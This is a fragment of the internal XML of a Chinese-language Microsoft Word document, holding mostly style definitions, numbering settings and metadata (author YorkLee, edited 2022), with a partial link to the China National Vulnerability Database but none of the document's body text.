        <w:lvlText w:val="%1.%2.%3 "/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="709" w:hanging="709"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="3">
      <w:lvl w:ilvl="3">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:isLgl/>
        <w:suff w:val="nothing"/>
        <w:lvlText w:val="%1.%2.%3.%4"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="0" w:firstLine="0"/>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16cid:durableId="1153984270">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="64687000">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="65736725">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1380470507">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="13260064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15F"/>
    <w:rsid w:val="000012A0"/>
    <w:rsid w:val="000F33AB"/>
    <w:rsid w:val="002C1A85"/>
    <w:rsid w:val="003D7125"/>
    <w:rsid w:val="00446457"/>
    <w:rsid w:val="004B212C"/>
    <w:rsid w:val="00530B90"/>
    <w:rsid w:val="00563CB3"/>
    <w:rsid w:val="00693CFA"/>
    <w:rsid w:val="006E388D"/>
    <w:rsid w:val="00715DC2"/>
    <w:rsid w:val="007317AF"/>
    <w:rsid w:val="009D4D4F"/>
    <w:rsid w:val="009D5FEE"/>
    <w:rsid w:val="009F215F"/>
    <w:rsid w:val="00B85133"/>
    <w:rsid w:val="00E448C6"/>
    <w:rsid w:val="00E9430B"/>
    <w:rsid w:val="00F47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93D1F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EBCAFA05-2990-4AB8-8699-6D5602A4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1A85"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>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uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A8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C1A8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2C1A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2C1A85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="002C1A8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C1A85"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A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代码"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="代码 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="ad"/>
    <w:next w:val="ad"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af4">
    <w:name w:val="图例"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af5"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="图例 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af4"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af7">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="11">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="002C1A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8">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="Times New Roman" w:cs="新宋体"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="time">
    <w:name w:val="time"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C1A85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bjh-p">
    <w:name w:val="bjh-p"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C1A85"/>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afc">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afe"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afe">
    <w:name w:val="脚注文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afd"/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:qFormat/>
    <w:rsid w:val="002C1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rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A85"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="002C1A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www.cnvd.org.c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vd.org.c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6928</Words>
  <Characters>39494</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>329</Lines>
  <Paragraphs>92</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46330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YorkLee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Fu Cai</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-13T14:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-13T14:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>